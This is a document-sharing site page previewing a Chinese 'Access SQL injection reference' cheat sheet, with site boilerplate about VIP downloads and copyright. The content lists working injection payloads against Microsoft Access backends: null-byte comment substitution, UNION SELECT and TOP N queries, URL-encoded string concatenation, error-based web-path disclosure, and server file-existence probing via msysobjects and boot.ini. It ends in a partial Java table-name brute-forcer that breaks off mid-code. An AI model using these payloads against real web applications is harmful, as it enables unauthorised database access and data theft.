AccessSQL注入参考.docxVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
AccessSQL注入参考

Access SQL注入参考 描述 SQL查询及注释 注释符 Access中没有专门的注释符号.因此/*, --和#都没法使用.但是可以使用空字符NULL(%00)代替: UNION SELECT 1,1,1 FROM validTableName%00 语法错误信息 [Microsoft][Driver ODBC Microsoft Access] 多句执行 不支持. 联合查询 Access支持联合查询,UNION后的FROM关键字必须使用一个已经存在的表名. 附属查询 Access支持附属查询(例如:TOP 1用来返回第一行的内容) : AND (SELECT TOP 1 someData FROM validTableName)%00 LIMIT支持 LIMIT不被支持,但是在查询中可以声明TOP N来限制返回内容的行数: UNION SELECT TOP 3 AttrName FROM validTableName%00 : 这条语句返回(前)3 行. 让查询返回0行 在脚本在返回的HTML结果中只显示第一个查询的结果的时候非常有用: AND 1=0 UNION SELECT AttrName1,AttrName2 FROM validTableName%00 字符串连接 不支持CONCAT()函数. 可以使用或+操作来俩接两个字符串.在使用的时侯必须对这两个操作符进行URLencode编码: UNION SELECT web %2b app FROM validTableName%00 : 返回webapp UNION SELECT web %26 app FROM validTableName%00 : 返回webapp 子字符串 MID()函数: UNION SELECT MID(abcd,1,1) FROM validTableName%00 : 返回 a UNION SELECT MID(abcd,2,1) FROM validTableName%00 : 返回 b 字符串长度 LEN()函数: UNION SELECT LEN(1234) FROM validTableName%00 : 返回 4 暴WEB路径 可以通过对一个不存在的库进行SELECT操作.Access将会回应一条包含有完整路径的错误信息.: UNION SELECT 1 FROM ThisIsAFakeName.FakeTable%00 取字符的ASCII值 ASC()函数: UNION SELECT ASC(A) FROM ValidTable%00 :返回65 (A的ASCII值) ASCII值转换为字符 CHR()函数: UNION SELECT CHR(65) FROM validTableName%00 : 返回 A IF语句 可以使用IIF()函数. 语法 : IIF(condition, true, false) : UNION SELECT IIF(1=1, a, b) FROM validTableName%00 : 返回 a 时间接口 不存在类似BENCHMARK()或SLEEP()的函数,但是可以使用大量(高负载)的查询来达到这个效果. HYPERLINK /technet/community/columns/secmvp/sv0907.mspx 点击这里查看参考. 验证文件是否存在 在注入的时候使用: UNION SELECT name FROM msysobjects IN \boot.ini%00 : (如果文件存在)将会获得一条错误信息:it informs that the database format was not recognized. 表名猜解 这里有一个简单的猜解access表名的java代码.我写他是为了更好的解释猜解表名的原理: static private String columnErrorMessage = ...; static private String accessError = ...; [...] public String bruteTableName(Request r) { // 0 String resp = new String(); String[] table = { tab_name1, tab_name2, ..., tab_nameN }; // 1 for(int i = 0; i table.length; i++) { resp = sendInjection(r, UNION SELECT 1 FROM + table[i] + %00); // 2 if(resp.contains(colum

文档评论(0)

didala + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档